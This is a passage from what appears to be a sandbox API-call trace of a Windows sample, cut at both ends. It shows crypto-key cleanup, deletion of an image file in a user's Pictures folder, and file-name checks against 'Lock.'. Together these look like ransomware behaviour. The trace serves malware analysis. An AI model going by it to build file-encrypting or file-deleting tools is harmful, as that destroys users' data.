lpsz="SSA4D00401A22") returned 0xd [0209.512] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.512] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.512] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.512] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.512] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.512] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.512] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.512] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab068, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0209.512] CryptDestroyKey (hKey=0x9e2138) returned 1 [0209.512] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.512] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.512] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.512] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.512] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.512] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.512] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.512] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.512] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.512] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.512] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.512] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.513] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0209.513] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.516] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.516] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.516] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.516] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.516] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0209.516] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.516] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0209.516] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.516] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.516] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.516] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.516] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.516] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.516] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.516] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.516] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.517] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.517] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.517] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.517] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.517] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.517] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.517] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.517] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.517] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.517] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.517] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.517] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.517] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.517] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.517] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.517] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.517] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.517] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.517] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.517] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.517] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.517] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.517] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0209.518] CryptReleaseContext (hProv=0xa7c7f8, dwFlags=0x0) returned 1 [0209.518] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.518] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.518] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.518] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.518] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.518] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0209.518] FreeLibrary (hLibModule=0x76390000) returned 1 [0209.518] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.518] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.518] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.518] CloseHandle (hObject=0x4dc) returned 1 [0209.519] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.519] CloseHandle (hObject=0x520) returned 1 [0209.522] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.524] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.524] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.524] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.524] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/cwsPQYJwproUEWJ.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cwsPQYJwproUEWJ.jpg", lpFilePart=0x8cedf4*="cwsPQYJwproUEWJ.jpg") returned 0x2c [0209.525] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cwsPQYJwproUEWJ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cwspqyjwprouewj.jpg")) returned 0x20 [0209.525] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cwsPQYJwproUEWJ.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef243d20, ftCreationTime.dwHighDateTime=0x1d5d294, ftLastAccessTime.dwLowDateTime=0x490f7b20, ftLastAccessTime.dwHighDateTime=0x1d5ceed, ftLastWriteTime.dwLowDateTime=0x490f7b20, ftLastWriteTime.dwHighDateTime=0x1d5ceed, nFileSizeHigh=0x0, nFileSizeLow=0x12289, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="cwsPQYJwproUEWJ.jpg", cAlternateFileName="CWSPQY~1.JPG")) returned 0x9e2078 [0209.525] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cwsPQYJwproUEWJ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cwspqyjwprouewj.jpg")) returned 1 [0209.529] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef243d20, ftCreationTime.dwHighDateTime=0x1d5d294, ftLastAccessTime.dwLowDateTime=0x490f7b20, ftLastAccessTime.dwHighDateTime=0x1d5ceed, ftLastWriteTime.dwLowDateTime=0x490f7b20, ftLastWriteTime.dwHighDateTime=0x1d5ceed, nFileSizeHigh=0x0, nFileSizeLow=0x12289, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="cwsPQYJwproUEWJ.jpg", cAlternateFileName="CWSPQY~1.JPG")) returned 0 [0209.529] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0209.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.530] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0209.530] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa648 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.530] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0209.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0209.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0209.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0209.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0209.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5a) returned 0x2a74980 [0209.532] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/cwsPQYJwproUEWJ.jpg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cwsPQYJwproUEWJ.jpg", lpFilePart=0x8cf650*="cwsPQYJwproUEWJ.jpg") returned 0x2c [0209.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74980 | out: hHeap=0x2af0000) returned 1 [0209.532] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cwsPQYJwproUEWJ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cwspqyjwprouewj.jpg")) returned 0xffffffff [0209.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0209.532] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0209.532] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.532] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0209.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0209.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0209.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0209.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0209.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D7Vw ag.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.533] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Vw ag.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.533] CompareStringW 